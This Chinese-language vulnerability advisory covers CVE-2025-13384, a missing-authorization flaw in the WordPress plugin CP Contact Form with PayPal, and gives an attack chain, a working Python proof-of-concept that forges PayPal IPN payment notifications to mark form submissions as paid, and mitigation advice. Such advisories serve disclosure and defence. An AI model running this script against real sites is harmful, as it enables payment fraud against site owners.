CVE-2025-13384 WordPress CP Contact Form with PayPal 插件未授权支付验证漏洞

漏洞信息

漏洞编号

CVE-2025-13384

漏洞类型

缺少授权控制

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CP Contact Form with PayPal plugin for WordPress

漏洞概述

CVE-2025-13384 是 WordPress 插件 CP Contact Form with PayPal 中的一个严重安全漏洞。该插件在所有版本直至 1.3.56 版本都存在缺少授权控制（Missing Authorization）的问题。漏洞根源在于插件暴露了一个未认证的 IPN（即时付款通知）类端点，通过 'cp_contactformpp_ipncheck' 查询参数访问。该端点在处理支付确认时缺少必要的身份验证、随机数验证以及 PayPal IPN 签名验证机制。由于这一设计缺陷，未经身份验证的攻击者可以伪造支付通知请求，携带任意的 POST 数据（如 payment_status、txn_id、payer_email），将表单提交标记为已付款状态，而无需实际完成支付。这使得攻击者能够免费获取付费内容或服务，造成经济损失。CVSS 3.1 评分为 7.5，属于高危漏洞，攻击复杂度低，无需认证即可利用，对数据完整性造成严重影响。

技术细节

漏洞存在于插件的 cp_contactformpp_functions.php 文件中（第 541、877、925 行附近）。问题端点通过 'cp_contactformpp_ipncheck' 查询参数暴露，正常情况下应接收并验证来自 PayPal 的 IPN 通知。然而，该端点缺少以下关键安全验证：1）未验证请求来源是否为合法的 PayPal 服务器 IP；2）未验证 PayPal IPN 签名或 HMAC 认证；3）未进行 WordPress nonce 验证；4）未检查用户权限或会话状态。攻击者仅需构造包含伪造支付状态参数的 POST 请求即可触发漏洞。典型利用方式：向目标网站发送包含 payment_status=Completed、txn_id=任意值、payer_email=任意值的请求，即可将对应表单提交标记为已支付。攻击者可批量自动化此过程，大规模实施欺诈。

攻击链分析

STEP 1

步骤1

攻击者识别运行 CP Contact Form with PayPal 插件（版本 ≤ 1.3.56）的 WordPress 网站

STEP 2

步骤2

攻击者构造恶意请求，访问插件的未认证 IPN 端点（/?cp_contactformpp_ipncheck=1）

STEP 3

步骤3

在请求中注入伪造的支付参数：payment_status=Completed、txn_id、payer_email 等

STEP 4

步骤4

由于插件不验证 PayPal IPN 签名和来源，伪造的支付通知被接受并处理

STEP 5

步骤5

插件将对应表单提交标记为已付款状态，允许攻击者免费获取付费内容或服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-13384 PoC - Missing Authorization in CP Contact Form with PayPal # Target: WordPress site with CP Contact Form with PayPal plugin <= 1.3.56 def exploit_cve_2025_13384(target_url, form_id='1'): """ Exploit for CVE-2025-13384 This PoC demonstrates how an unauthenticated attacker can forge payment notifications to mark form submissions as paid without actual payment. """ # Construct the vulnerable endpoint endpoint = f"{target_url}/?cp_contactformpp_ipncheck=1&cp_contactformpostid={form_id}" # Forge payment notification data (no signature validation) payload = { 'payment_status': 'Completed', 'txn_id': 'FAKE_TXN_' + str(hash(str(target_url)))[:10], 'payer_email': '[email protected]', 'mc_gross': '99.00', 'mc_currency': 'USD', 'item_name': 'Form Submission Payment', 'custom': form_id } print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-13384...") print(f"[*] Sending forged payment notification to: {endpoint}") try: response = requests.post(endpoint, data=payload, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") if response.status_code == 200: print("[!] Payment notification processed - form may be marked as paid") return response except requests.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [form_id]") sys.exit(1) target = sys.argv[1] form_id = sys.argv[2] if len(sys.argv) > 2 else '1' exploit_cve_2025_13384(target, form_id)

影响范围

CP Contact Form with PayPal plugin for WordPress <= 1.3.56

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1）在 Web 服务器层面阻止包含 'cp_contactformpp_ipncheck' 参数的外部请求；2）临时禁用 PayPal 支付功能，改用其他支付插件；3）启用双因素认证和交易复核机制；4）监控日志中的异常 IPN 请求模式。建议尽快升级到插件官方发布的安全修复版本（1.3.57+）。